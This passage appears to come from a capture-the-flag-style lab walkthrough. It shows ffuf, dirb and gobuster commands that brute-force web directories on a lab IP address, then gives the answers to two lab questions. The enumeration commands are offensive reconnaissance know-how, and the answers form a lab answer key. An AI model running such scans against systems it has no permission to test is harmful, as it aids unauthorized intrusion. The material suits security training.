    ffuf
    
            
    user@machine$ ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u http://10.10.159.199/FUZZ
    
            
    
    
    
    Using dirb:
    
    dirb
    
               
    user@machine$ dirb http://10.10.159.199/ /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
    
            
    
    
    
    Using Gobuster:
    
    gobuster
    
               
    user@machine$ gobuster dir --url http://10.10.159.199/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
    
            
    
    
    
    

     


    1) What is the name of the directory beginning "/mo...." that was discovered?

    Ans- /monthly



    2) What is the name of the log file that was discovered?

    Ans- /development.log

     

     



      - Hacking Truth by Kumar Atul Jaiswal

     

